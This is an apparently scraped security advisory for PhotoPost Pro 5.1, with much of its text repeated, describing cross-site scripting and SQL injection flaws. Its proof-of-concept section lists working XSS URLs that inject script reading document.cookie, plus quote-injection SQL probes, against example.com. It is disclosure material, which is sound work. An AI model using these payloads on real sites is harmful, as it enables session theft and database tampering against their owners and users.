PhotoPost Pro Multiple Input Validation Vulnerabilities
BID:12920
Info
PhotoPost Pro Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 12920 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0928 CVE-2005-0929 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 28 2005 12:00AM |
| Updated: | Jul 12 2009 11:56AM |
| Credit: | Discovery of these issues is credited to Diabolic Crab. |
| Vulnerable: |
PhotoPost PhotoPost Pro 5.1 |
| Not Vulnerable: | |
Discussion
PhotoPost Pro Multiple Input Validation Vulnerabilities
Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
The first set of issues are cross-site scripting vulnerabilities that affect the 'slideshow.php', 'showgallery.php', and 'showmembers.php' scripts. These issues arise as the application fails to properly sanitize input passed through the offending functions before including it in dynamically generated Web content.
The second set of issues are SQL injection vulnerabilities that affect the 'showmembers.php' and 'showphoto.php' scripts. The application includes the value of the offending parameters without sanitization, allowing an attacker to inject SQL syntax and manipulate SQL queries.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
The first set of issues are cross-site scripting vulnerabilities that affect the 'slideshow.php', 'showgallery.php', and 'showmembers.php' scripts. These issues arise as the application fails to properly sanitize input passed through the offending functions before including it in dynamically generated Web content.
The second set of issues are SQL injection vulnerabilities that affect the 'showmembers.php' and 'showphoto.php' scripts. The application includes the value of the offending parameters without sanitization, allowing an attacker to inject SQL syntax and manipulate SQL queries.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Exploit / POC
PhotoPost Pro Multiple Input Validation Vulnerabilities
No exploit is required, the following examples are available:
http://www.example.com/photos/slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bpassword=&amp%3bsort=1&amp%3bcat=502
http://www.example.com/photos/showgallery.php?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/photos/showgallery.php?si=&sort=1&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=%22%3E%3Cscript%3Ealert(document.cook
ie)%3C/script%3E
http://www.example.com/photos/showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&friendemail=%3d'email%40yourfriend.com')this.value
%3d''%3b&password=
http://www.example.com/photos/showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d
''%3b&password=
http://www.example.com/photos/showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/photos/showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/photos/showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser=
http://www.example.com/photos/showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=4&cat=500&ppuser=
http://www.example.com/photos/showmembers.php?sl='SQL_INJECTION
http://www.example.com/photos/showphoto.php?photo='SQL_ERROR
No exploit is required, the following examples are available:
http://www.example.com/photos/slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bpassword=&amp%3bsort=1&amp%3bcat=502
http://www.example.com/photos/showgallery.php?cat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/photos/showgallery.php?si=&sort=1&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d''%3b&password=%22%3E%3Cscript%3Ealert(document.cook
ie)%3C/script%3E
http://www.example.com/photos/showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&friendemail=%3d'email%40yourfriend.com')this.value
%3d''%3b&password=
http://www.example.com/photos/showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=2&ppuser=&friendemail=%3d'email%40yourfriend.com')this.value%3d
''%3b&password=
http://www.example.com/photos/showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/photos/showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/photos/showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&cat=500&ppuser=
http://www.example.com/photos/showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sort=4&cat=500&ppuser=
http://www.example.com/photos/showmembers.php?sl='SQL_INJECTION
http://www.example.com/photos/showphoto.php?photo='SQL_ERROR
Solution / Fix
PhotoPost Pro Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PhotoPost Pro Multiple Input Validation Vulnerabilities
References:
References: